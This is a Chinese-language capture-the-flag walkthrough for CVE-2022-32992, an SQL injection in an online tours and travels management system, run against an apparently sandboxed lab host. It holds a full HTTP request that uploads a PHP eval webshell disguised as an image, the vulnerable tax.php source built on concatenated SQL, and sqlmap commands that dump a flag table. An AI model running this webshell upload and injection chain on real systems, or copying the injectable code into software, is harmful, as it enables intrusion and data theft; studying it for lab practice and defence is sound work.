文章目录
CVE-2022-32992
一、漏洞介绍
Online Tours & Travels management system SQLI
该CMS的admin/operations/tax.php中存在可控的INSERT 语句参数,从而导致了SQL注入攻击。
二、渗透步骤
1、打开网站
http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/
2、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/
3、访问网页
http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/file.php
4、上传WebShell
POST /admin/file.php HTTP/1.1
Host: eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------266977755039526940004077612149
Content-Length: 371
Origin: http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/file.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685507993,1686039389,1686125034,1686301526; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686301712; PHPSESSID=eci5f3514tjk6qg35mnl3qp53p
Upgrade-Insecure-Requests: 1
-----------------------------266977755039526940004077612149
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/jpeg
<?php @eval($_POST["cmd"]) ?>
-----------------------------266977755039526940004077612149
Content-Disposition: form-data; name="submit"
Upload Image
-----------------------------266977755039526940004077612149--
5、蚁剑连接
http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/upload/2.php
6、修改配置文件
/var/www/html/admin/operations/tax.php
<?php
//require_once('../check_login.php');
?>
<?php
include"../config.php";
try {
$conn = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
// set the PDO error mode to exception
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
if(isset($_POST['submit']))
{
$sql = "INSERT INTO tax (tname, percent, short_code)
VALUES ('".$_POST['tname']."', '".$_POST['percent']."', '".$_POST['short_code']."')";
// use exec() because no results are returned
$conn->exec($sql);
$_SESSION['success']=' Record Added Successfully.....';
// echo "New record created successfully";
// $_SESSION['reply'] = "Added Successfully";
header("location:../tax_details.php");
}
if(isset($_POST['update']))
{
$sql = "UPDATE tax SET tname='".$_POST['tname']."',
percent='".$_POST['percent']."',
short_code='".$_POST['short_code']."'
WHERE id='".$_GET['edit_id']."'";
// Prepare statement
$stmt = $conn->prepare($sql);
// execute the query
$stmt->execute();
$_SESSION['success']=' Record Updated Successfully......';
// $_SESSION['reply'] = "Added Successfully";
header("location:../tax_details.php");
}
if(isset($_GET['id']))
{
$sql = "DELETE FROM tax WHERE id='".$_GET['id']."'";
// use exec() because no results are returned
$conn->exec($sql);
$_SESSION['success']=' Record Successfully Deleted';
// echo "Record deleted successfully";
// $_SESSION['reply'] = "Record deleted successfully";
//header("location:../tax_details.php");
}
}
catch(PDOException $e)
{
echo $sql . "<br>" . $e->getMessage();
}
$conn = null;
?>
7、sqlmap注入
(1)、探测数据库
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1" --dbs --batch
(2)、探测数据表
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1" -D ctf --tables --batch
(3)、探测列名
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1" -D ctf -T flag --columns --batch
(4)、查看flag值
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://eci-2ze31var5g0pe30qtxd3.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1" -D ctf -T flag -C flag --dump --batch